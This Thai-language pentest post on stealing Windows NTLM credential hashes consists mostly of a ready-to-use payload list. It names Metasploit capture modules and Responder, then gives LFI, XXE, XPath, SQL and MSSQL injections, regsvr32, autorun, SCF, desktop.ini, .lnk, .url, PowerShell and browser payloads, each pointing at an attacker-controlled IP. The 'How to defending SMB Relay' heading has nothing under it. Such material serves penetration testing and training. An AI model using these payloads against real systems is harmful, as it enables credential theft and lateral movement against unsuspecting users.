ทดสอบการขโมย NTLM Password

NTLM มาจากการรวมกันของ

• NT: New technologies (Windows)
• LAN: Local area network
• M: Manager

ใน Windows Network, NTLLM เป็น Microsoft security protocols. โดย authentication ทาง network โดย default ของเครื่อง Windows NT 4.0 operating system และ NTLMv2 เป็น version ล่าสุด และใช้ NT MD4 เป็น hash function มีความยาวที่ 128 bits ใช้ได้ทั้ง local account และ Domain account.

ทดสอบ capture NTLM โดยใช้ Metasploit Module (auxiliary/server/capture/http_ntlm)

เมื่อ user ทำการเข้าเว็บไซด์ของเราจะมีการให้กรอก username, password ซึ่งเป็น NTLM ไปให้ครับ

ทดสอบ capture NTLM โดยใช้ Metasploit Module (auxiliary/server/capture/smb)

หาก user เข้าใช้งาน file sharing ที่ Attacker ก็จะกลายเป็นส่ง NTLM ไปให้ Attacker ครับ (ซึ่งโดยปกติมันจะส่ง username, password ที่ใช้ ณ ขณะนั้นให้ก่อนเลยครับ)

ทดสอบ capture NTLM โดยใช้ Metasploit Module (auxiliary/docx/word_unc_injector)

ไฟล์ word จะถูกสร้างแล้วทิ้งไว้ที่ /root/.msf4/loot/msf.docx ที่เหลือคือรอให้ client เปิดไฟล์ครับ

ทดสอบ capture NTLM โดยใช้ Responder

Responder เป็นเครื่องมือที่ถูกสร้างมาเพื่อการ capture NTLM โดยเฉพาะ โดยเมื่อเรารันขึ้นมาตัว Responder ก็จะสร้าง service ที่เต็มไปด้วย NTLM Authentication เต็มไปหมด

เมื่อ user เข้าไปใช้บริการ service ใดๆ เช่น HTTP, File Sharing เป็นต้น ก็จะทำการส่ง NTLM ไปให้กับทาง attacker

How to defending SMB Relay

วิธีการขโมยผ่าน Web Attack

• LFI
  • http://host.tld/?page=//11.22.33.44
• XXE
  • <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//11.22.33.44/@OsandaMalith" > ]> <root> <name></name> <tel></tel> <email>OUT&xxe;OUT</email> <password></password> </root>

    1 2 3 4 5 6 7 8 9

    <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//11.22.33.44/@OsandaMalith" > ]> <root>   <name></name>   <tel></tel>   <email>OUT&xxe;OUT</email>   <password></password> </root>

• XPATH Injection
  • http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/')

    1	http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/')

• SQL Injection
  • http://host.tld/index.php?id=1’ union select 1,2,load_file(‘\\\\192.168.0.100\\@OsandaMalith’),4;%00

    1	http://host.tld/index.php?id=1’ union select 1,2,load_file(‘\\\\192.168.0.100\\@OsandaMalith’),4;%00

• MSSQL Injection
  • ';declare @q varchar(99);set @q='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q

    1	';declare @q varchar(99);set @q='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q

Post Exploitation

• regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll

  1	regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll

• Batch
  • echo 1 > //192.168.0.1/abc pushd \\192.168.0.1\abc cmd /k \\192.168.0.1\abc cmd /c \\192.168.0.1\abc start \\192.168.0.1\abc mkdir \\192.168.0.1\abc type\\192.168.0.1\abc dir\\192.168.0.1\abc find, findstr, [x]copy, move, replace, del, rename and many more!

    1 2 3 4 5 6 7 8 9

    echo 1 > //192.168.0.1/abc pushd \\192.168.0.1\abc cmd /k \\192.168.0.1\abc cmd /c \\192.168.0.1\abc start \\192.168.0.1\abc mkdir \\192.168.0.1\abc type\\192.168.0.1\abc dir\\192.168.0.1\abc find, findstr, [x]copy, move, replace, del, rename and many more!

• AutoRun
  • [autorun] open=\\35.164.153.224\setup.exe icon=something.ico action=open Setup.exe

    1 2 3 4

    [autorun] open=\\35.164.153.224\setup.exe icon=something.ico action=open Setup.exe

• Shell Command files (SCF)
  • [Shell] Command=2 IconFile=\\35.164.153.224\test.ico [Taskbar] Command=ToggleDesktop

    1 2 3 4 5

    [Shell] Command=2 IconFile=\\35.164.153.224\test.ico [Taskbar] Command=ToggleDesktop

• Desktop.ini
  • mkdir openMe attrib +s openMe cd openMe echo [.ShellClassInfo] > desktop.ini echo IconResource=\\192.168.0.1\aa >> desktop.ini attrib +s +h desktop.ini

    1 2 3 4 5 6

    mkdir openMe attrib +s openMe cd openMe echo [.ShellClassInfo] > desktop.ini echo IconResource=\\192.168.0.1\aa >> desktop.ini attrib +s +h desktop.ini

• Shortcut Files (.lnk)
  • Set shl = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") currentFolder = shl.CurrentDirectory Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "\StealMyHashes.lnk")) sc.TargetPath = "\\35.164.153.224\@OsandaMalith" sc.WindowStyle = 1 sc.HotKey = "Ctrl+Alt+O" sc.IconLocation = "%windir%\system32\shell32.dll, 3" sc.Description = "I will Steal your Hashes" sc.Save Powershell version $objShell = New-Object -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("StealMyHashes.lnk") $lnk.TargetPath = "\\35.164.153.224\@OsandaMalith" $lnk.WindowStyle = 1 $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "I will Steal your Hashes" $lnk.HotKey = "Ctrl+Alt+O" $lnk.Save()

    1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

    Set shl = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") currentFolder = shl.CurrentDirectory Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "\StealMyHashes.lnk")) sc.TargetPath = "\\35.164.153.224\@OsandaMalith" sc.WindowStyle = 1 sc.HotKey = "Ctrl+Alt+O" sc.IconLocation = "%windir%\system32\shell32.dll, 3" sc.Description = "I will Steal your Hashes" sc.Save     Powershell version $objShell = New-Object -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("StealMyHashes.lnk") $lnk.TargetPath = "\\35.164.153.224\@OsandaMalith" $lnk.WindowStyle = 1 $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "I will Steal your Hashes" $lnk.HotKey = "Ctrl+Alt+O" $lnk.Save()

• Internet Shortcut (.url)
  • echo [InternetShortcut] > stealMyHashes.url echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url

    1 2	echo [InternetShortcut] > stealMyHashes.url echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url

• Powershell
  • Invoke-Item \\192.168.0.1\aa Get-Content \\192.168.0.1\aa Start-Process \\192.168.0.1\aa

    1 2 3

    Invoke-Item \\192.168.0.1\aa Get-Content \\192.168.0.1\aa Start-Process \\192.168.0.1\aa

• IE
  • <img src="\\\\192.168.0.1\\aa">

    1	<img src="\\\\192.168.0.1\\aa">

    VBScript
  • <html> <script type="text/Vbscript"> <!-- Set fso = CreateObject("Scripting.FileSystemObject") Set file = fso.OpenTextFile("//192.168.0.100/aa", 1) //--> </script> </html>

    1 2 3 4 5 6 7 8

    <html> <script type="text/Vbscript"> <!-- Set fso = CreateObject("Scripting.FileSystemObject") Set file = fso.OpenTextFile("//192.168.0.100/aa", 1) //--> </script> </html>

Source:: HackingArticles, LM, Osandamalith